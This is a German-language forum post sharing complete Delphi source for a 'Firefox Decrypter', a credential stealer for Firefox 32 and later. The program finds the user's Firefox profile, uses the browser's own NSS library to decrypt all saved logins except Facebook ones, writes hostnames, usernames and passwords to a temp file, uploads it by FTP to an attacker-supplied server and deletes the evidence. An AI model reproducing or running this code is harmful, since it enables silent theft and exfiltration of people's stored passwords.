Themabewertung:
  • 0 Bewertung(en) - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
  [Delphi] Firefox Decrypter (32.0+)
#1
Code:
program Project1;

{$APPTYPE CONSOLE}

{$R *.res}

uses
 Windows, SysUtils, Registry, StrUtils, IOUtils, superobject,
 IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient,
 IdExplicitTLSClientServerBase, IdFTP,IdServerIOHandler, IdSSL, IdSSLOpenSSL;

var
 FFPath, PRFPath: String;

function getFileSize(const Name: string): Integer;
var
 SRec: TSearchRec;
begin
 Result := 0;
 if FindFirst(name, faAnyfile, SRec) = 0 then
 begin
   Result := SRec.Size;
   FindClose(SRec);
 end;
end;

function isFirefoxInstalled: Boolean;
var
 Reg: TRegistry;
begin
 Reg := TRegistry.Create;
 with Reg do
 try
   RootKey := HKEY_LOCAL_MACHINE;
   Result := OpenKey('Software\Mozilla\Mozilla Firefox', False);
 finally
   Free;
 end;
end;

function getFirefoxPath: String;

 function ReadKeyToString(hRoot: HKEY; sKey, sSubKey: string): string;
 var
   hOpen: HKEY;
   sBuff: array [0 .. 255] of char;
   nSize: Integer;
 begin
   if (RegOpenKeyEx(hRoot, PChar(sKey), 0, KEY_QUERY_VALUE, hOpen) = ERROR_SUCCESS) then
   begin
     nSize := SizeOf(sBuff);
     RegQueryValueEx(hOpen, PChar(sSubKey), nil, nil, @sBuff, @nSize);
     Result := sBuff;
   end;
   RegCloseKey(hOpen);
 end;

var
 FFVer: String;
begin
 FFVer := ReadKeyToString(HKEY_LOCAL_MACHINE,
   'Software\Mozilla\Mozilla Firefox', 'CurrentVersion');
 Result := ReadKeyToString(HKEY_LOCAL_MACHINE,
   'Software\Mozilla\Mozilla Firefox\' + FFVer + '\Main', 'Install Directory');
end;

function getProfilesPath: String;
var
 AppData: String;
 sResult: TSearchRec;
begin
 AppData := GetEnvironmentVariable('APPDATA');
 if FindFirst(AppData + '\Mozilla\Firefox\Profiles\*.default', faDirectory, sResult) = 0 then
 begin
   Result := AppData + '\Mozilla\Firefox\Profiles\' + sResult.Name;
   FindClose(sResult);
 end;
end;

function getCredentials: String;
type
 PSECItem = ^TSECItem;
 TSECItem = packed record
   SECItemType: DWORD;
   SECItemData: PAnsiChar;
   SECItemLen: DWORD;
 end;
var
 NSSModule: HModule;

 NSS_Init: function(configdir: PAnsiChar): DWORD; cdecl;

 NSSBase64_DecodeBuffer: function(
 arenaOpt: Pointer; outItemOpt: PSECItem;
 inStr: PAnsiChar; inLen: DWORD): DWORD; cdecl;

 PK11_GetInternalKeySlot: function: Pointer; cdecl;

 PK11_Authenticate: function(
 slot: Pointer; loadCerts: Boolean; wincx: Pointer): DWORD; cdecl;

 PK11SDR_Decrypt: function(
 data: PSECItem; Result: PSECItem; cx: Pointer): DWORD; cdecl;

 NSS_Shutdown: procedure; cdecl;

 PK11_FreeSlot: procedure(slot: Pointer); cdecl;

 EncSECItem1,
 DecSECItem1: array of TSECItem;
 EncSECItem2,
 DecSECItem2: array of TSECItem;

 KeySlot: Pointer;

 i: integer;
 Logins: TSuperArray;
 IMyObject: ISuperObject;
 ILoop: ISuperObject;

 Username, Password: AnsiString;
 Buffer: String;
begin
 SetDllDirectory(PChar(FFPath));
 NSSModule := LoadLibrary('nss3.dll');
 SetDllDirectory(nil);

 @NSS_Init := GetProcAddress(NSSModule, 'NSS_Init');
 @NSS_Shutdown := GetProcAddress(NSSModule, 'NSS_Shutdown');
 @PK11_FreeSlot := GetProcAddress(NSSModule, 'PK11_FreeSlot');
 @PK11_Authenticate := GetProcAddress(NSSModule, 'PK11_Authenticate');
 @PK11_GetInternalKeySlot := GetProcAddress(NSSModule, 'PK11_GetInternalKeySlot');
 @PK11SDR_Decrypt := GetProcAddress(NSSModule, 'PK11SDR_Decrypt');
 @NSSBase64_DecodeBuffer := GetProcAddress(NSSModule, 'NSSBase64_DecodeBuffer');

 IMyObject := TSuperObject.ParseFile(PRFPath + '\logins.json', false);
 Logins:= IMyObject.A['logins'];
 if Logins.Length > 0 then
 begin
   if NSS_Init(PAnsiChar(AnsiString(PRFPath))) = ERROR_SUCCESS then
   begin
     KeySlot := PK11_GetInternalKeySlot;
     if KeySlot <> nil then
     begin
     if PK11_Authenticate(KeySlot, True, nil) = 0 then
     begin
     SetLength(DecSECItem1, Logins.Length);
     SetLength(EncSECItem1, Logins.Length);
     SetLength(DecSECItem2, Logins.Length);
     SetLength(EncSECItem2, Logins.Length);
     for i := 0 to Logins.Length - 1 do
     begin
     ILoop := Logins.O[i];
     if not AnsiContainsText(ILoop.S['hostname'], 'facebook') then
     begin
           Result := Result + ILoop.S['hostname'] + sLineBreak;

           Username := ILoop.S['encryptedUsername'];
           NSSBase64_DecodeBuffer(nil, @EncSECItem1[i], PAnsiChar(Username), Length(Username));
           PK11SDR_Decrypt(@EncSECItem1[i], @DecSECItem1[i], nil);
           SetString(Buffer, DecSECItem1[i].SECItemData, DecSECItem1[i].SECItemLen);
           Result := Result + Buffer + sLineBreak;

           Password := ILoop.S['encryptedPassword'];
           NSSBase64_DecodeBuffer(nil, @EncSECItem2[i], PAnsiChar(Password), Length(Password));
           PK11SDR_Decrypt(@EncSECItem2[i], @DecSECItem2[i], nil);
           SetString(Buffer, DecSECItem2[i].SECItemData, DecSECItem2[i].SECItemLen);
           Result := Result + Buffer + sLineBreak + sLineBreak;
     end;
     end;
     end;
     PK11_FreeSlot(KeySlot);
     end;
     NSS_Shutdown;
   end;
 end;
 FreeLibrary(NSSModule);
end;

var
 Tmp: String;
 idFTP1: TidFTP;
 SSL: TIdSSLIOHandlerSocketOpenSSL;

begin
 if not isFirefoxInstalled then Exit;
 FFPath := getFirefoxPath;
 PRFPath := getProfilesPath;
 // if file does not exists = user didn't save account
 if not FileExists(PRFPath + '\logins.json') then Exit;
 Tmp := ExtractFilePath(ParamStr(0)) + TPath.GetGUIDFileName + '.txt';
 TFile.WriteAllText(Tmp, getCredentials);
 if getFileSize(Tmp) <> 0 then
 begin
   SSL := TIdSSLIOHandlerSocketOpenSSL.Create(nil);
   idFTP1 := TidFTP.Create(nil);
   try
     try
     SSL.SSLOptions.Method := sslvSSLv23;
     SSL.SSLOptions.Mode := sslmClient;

     idFTP1.IOHandler := SSL;
     idFTP1.UseTLS := utUseExplicitTLS;
     idFTP1.Passive := True;

     idFTP1.Host := ''; // ftp hostname
     idFTP1.Username := ''; // your ftp acc username
     idFTP1.Password := ''; // ftp acc password
     idFTP1.Connect;
     idFTP1.Put(Tmp, ExtractFileName(Tmp));
     idFTP1.Disconnect;
     finally
     SSL.Free;
     idFTP1.Free;
     DeleteFile(Tmp);
     end;
   except
     SSL.Free;
     idFTP1.Free;
     DeleteFile(Tmp);
   end;
 end;
 DeleteFile(Tmp);
end.
Zitieren


Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste
www.D3n1s.Net